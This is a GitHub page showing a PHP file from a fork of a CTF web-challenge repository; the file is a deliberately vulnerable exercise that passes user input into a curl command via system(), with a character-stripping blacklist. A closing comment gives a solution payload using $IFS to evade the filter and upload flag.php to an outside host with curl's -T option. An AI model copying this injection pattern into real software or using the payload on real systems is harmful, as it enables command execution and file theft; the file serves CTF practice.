forked from wonderkun/CTF_web
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpractice.php
55 lines (40 loc) · 1.13 KB
/
practice.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
<?php
// error_reporting(E_ALL || ~E_NOTICE);
function strreplace($str){
$str = str_replace('`','',$str);
$str = str_replace(';','',$str);
$str = str_replace('|','',$str);
$str = str_replace('&','',$str);
$str = str_replace('>','',$str);
$str = str_replace(')','',$str);
$str = str_replace('(','',$str);
$str = str_replace(')','',$str);
$str = str_replace('{','',$str);
$str = str_replace('}','',$str);
$str = str_replace('%','',$str);
$str = str_replace('#','',$str);
$str = str_replace('!','',$str);
$str = str_replace('?','',$str);
$str = str_replace('@','',$str);
$str = str_replace('+','',$str);
$str = str_replace('/','',$str);
$str = str_replace(':','',$str); //添加这一句
return $str;
}
if($_GET['num']<>""){
$num = $_GET['num'];
if(strstr($num,'1')){
die("Sorry");
}elseif($num <> 1){
echo "Try to num = 1";
}
if($num == 1 ){
echo "Flag in http://127.0.0.1/flag.php"."</br>";
$cmd=trim($_GET['cmd']);
$cmd=strreplace($cmd);
var_dump("curl$cmd/flag.php");
system("curl$cmd/flag.php");
}
}else{echo "It Works!";}
//$cmd=$IFS\-x$IFS\wonderkun.cc$IFS\-T$IFS\flag.php$IFS\http
?>